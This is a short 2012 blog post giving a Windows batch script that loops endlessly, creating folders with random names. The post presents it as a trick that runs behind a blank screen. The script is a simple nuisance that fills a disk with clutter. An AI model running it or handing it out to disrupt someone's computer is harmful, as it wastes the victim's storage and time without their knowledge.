Sunday 21 October 2012

Make over 1,000 folders in few seconds


1. Open notepad and type : 
@echo off
:top
md %random%
goto top
2. Save as anything.bat 
Result:@echo off makes it so that it appears to be a blank screen but actually its making hundreds of folder. 
md %random% is command that creates folders with random names. goto top – return to label :top, and initiates an
infinite loop.

No comments:

Post a Comment